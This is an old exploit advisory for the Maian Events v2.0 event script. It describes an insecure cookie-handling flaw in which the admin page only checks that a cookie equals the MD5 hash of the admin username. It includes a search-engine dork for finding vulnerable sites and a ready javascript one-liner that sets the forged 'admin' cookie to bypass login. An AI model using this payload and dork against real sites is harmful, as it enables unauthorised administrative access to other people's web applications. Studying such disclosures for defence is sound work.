Maian Events version 2.0 suffers from a poorly designed cookie vulnerability.
109aad15912a224b4490ae868c58a9e1e09d31bae4851c465710810906825354
Author: Saime
Date: July 12, 2008
Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved
Description:
Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie,
equals admin username(md5)
Exploit:
javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin